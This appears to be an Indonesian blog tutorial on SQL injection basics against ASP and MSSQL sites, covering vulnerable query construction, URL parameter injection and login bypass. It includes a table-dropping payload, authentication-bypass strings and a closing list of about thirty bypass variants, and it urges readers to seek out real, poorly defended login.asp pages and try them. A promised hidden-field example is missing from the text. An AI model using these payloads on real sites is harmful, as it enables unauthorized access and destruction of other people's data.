Slider

[4] [Jalan-jalan] [slider-top-big] [Jalan-Jalan]
You are here: Home / DASAR-DASAR SQL INJECTION

DASAR-DASAR SQL INJECTION

| No comment

Sebenernya SQL injection terjadi ketika attacker bisa meng insert beberapa SQL statement ke 'query'
dengan cara manipulasi data input ke applikasi tsb.
Diantara DB format seperti PHP + MySQL dan ASP + MSACCESS atau dengan MySql ,
disini gw cuma akan membahas tentang ASP+MsSql yang udah dicoba pada IIS 5 dan
beberapa sql injection pada url.
Biasa Sql Injection dilakukan pada login page pada asp seperti di :
admin\login.asp
login.asp
Jadi yang akan menjadi target itu page tersebut ,
sekarang kita mulai aja dengan dasar-dasar sql injection :d.
Biasanya di sql statment
select id, user_name, password from user
maksudnya perintah diatas menghasilkan data id,user_name dan password pada table user.
Bisanya pada login page dengan mengunakan statment result setnya sebagai berikut :
select id, user_name,password from user where name = 'echo' and password='password'
Pada IIS dan ASP apabila terdapat kesalahan sintax script akan diberi tau dan ditampilkan di browser
Server: Msg 170, Level 15, State 1, Line 1 Line 1: Incorrect syntax near 'jopi' SQL atau "Structured Query Language"
seharusnya tidak menyentuh system calls. Tetapi tidak dengan MSSQL.
Nah, ga tau kenapa karakter single quote 'breaks out'
dari delimiter nya SQL Jadi kalau misal ada inputan
User: echo';drop table user--
dan akibatnya akan fatal , dan artinya adalah kita menghapus table user dan akan kosong deh tuh loginya :D
oh iya '--' merukapan mark nya MSSQL, jadi perintah selanjutnya ga di execute.
Sekarang untuk lebih jelasnya kita secara langsung pada login script seperti
input login + password. Nama field nya 'login' dan 'pass'. dan
SQL nya di asp: var sql = select * from users where username='"+login+"' and password='"+pass"'";
coba kalau ada inputan: login: ';drop table users-- pass: chfn (*wink* negative)
pasti ke drop tuh table users
Aduh pada pusing ya , gini deh cara gampangnya adn kita lupakan yang diatas :P kita langsung praktek aja>
Coba cari disitus-situs yang menggunakan asp dan MsSql sebagai DB nya, lalu cari login.asp atau
admin\login.asp.
Kalau udah dapet masukin nich variable sql nya
user:admin
pass:' or 1=1--
Ingat kita disini hanya coba-coba kali aja dba nya ga pinter :d
atau :
user:' or 1=1--
admin:' or 1=1--
Mas , ga bisa nich gimana ya ?
Inget sekarang rata-rata para admin pada pinter semua , kita cari yg gombol aja deh untuk tes kalau ga lo bisa
buat sendiri script dan tes karena gw udah coba buat sendiri dan berhasil tanpa melakukan paket filter
pada db nya . Untuk test apakah suatu page mempunyai vulnerable , gini caranya :
Kalian pernh melihat pada halaman-halaman ASP,JSP,PHP dan CGI yang didalam addressnya :
http://vivtim/index.asp?id=10
Selain kita test dengan login page diatas tadi , kita test dalam melakukan sedikit tambahan
pada addressnya seperti memasukan : test'1=1--
menjadi http://victim/index.asp?id=test'1=1--
Kita juga bisa juga melakukan xss dengan sql injection ini , coba download source HTML dari page target
lalu kita tamhankan hidden field pada source tersebut sebagai contoh :


Apabila beruntung kita apabila membuka page tersebut tidak perlu memasukan password dan username.
ingat script ini ditamhakna pd script yg sudah kalian download dr target .

Variable ' or 1=1--
Mungkin pada bertanya-tanya kenapa mengunakan variable 'or 1=1-- dan sangat penting.Lihat contoh
pada sebuah web tertulis http://victim/index.asp?category=laptop
Dalam url tesebut category adalah variable name dan komputer adalah masukan untuk variable name tsb .
Kalau ditulis dalam script ASP maka akan menjadi :
v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)
Data yang kita masukan seperti komputer akan masuk ke dalam v_cat variable dan pd sql statment menjadi
SELECT * FROM product WHERE PCategory='laptop'
lalu apa hub dengan 'or 1=1---
coba kalau kita ganti http://victim/index.asp?category=laptop menjadi
http://victim/index.asp?category=laptop'or 1=1--
Kita lihat varible v_cat sekarang menjadi laptop'or 1=1-- lalu dalam SQL query nya menjadi
SELECT * FROM product WHERE PCategory='laptop' or 1=1--'
artinya v_cat mendapatkan masukan berupa varibale laptop atau var 1=1(kosong) yang menyebabkan
Sql Server menjadi bingung dan akan mengeksekusi Select * pada table tsb yang mengakibatkan
kita bisa masuk kedalam db teserbut dan db tsb tdk berfungsi :d. Lalu tanda -- merupakan 
mark dari sql untuk ignore semua perintah. Bisa dibayangkan kalau terjadi pada login page
Kita bisa masuk kedalam login page tanpa password dan user name
Kemungkinan-kemungkinan variable lainya :
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
Share This Post :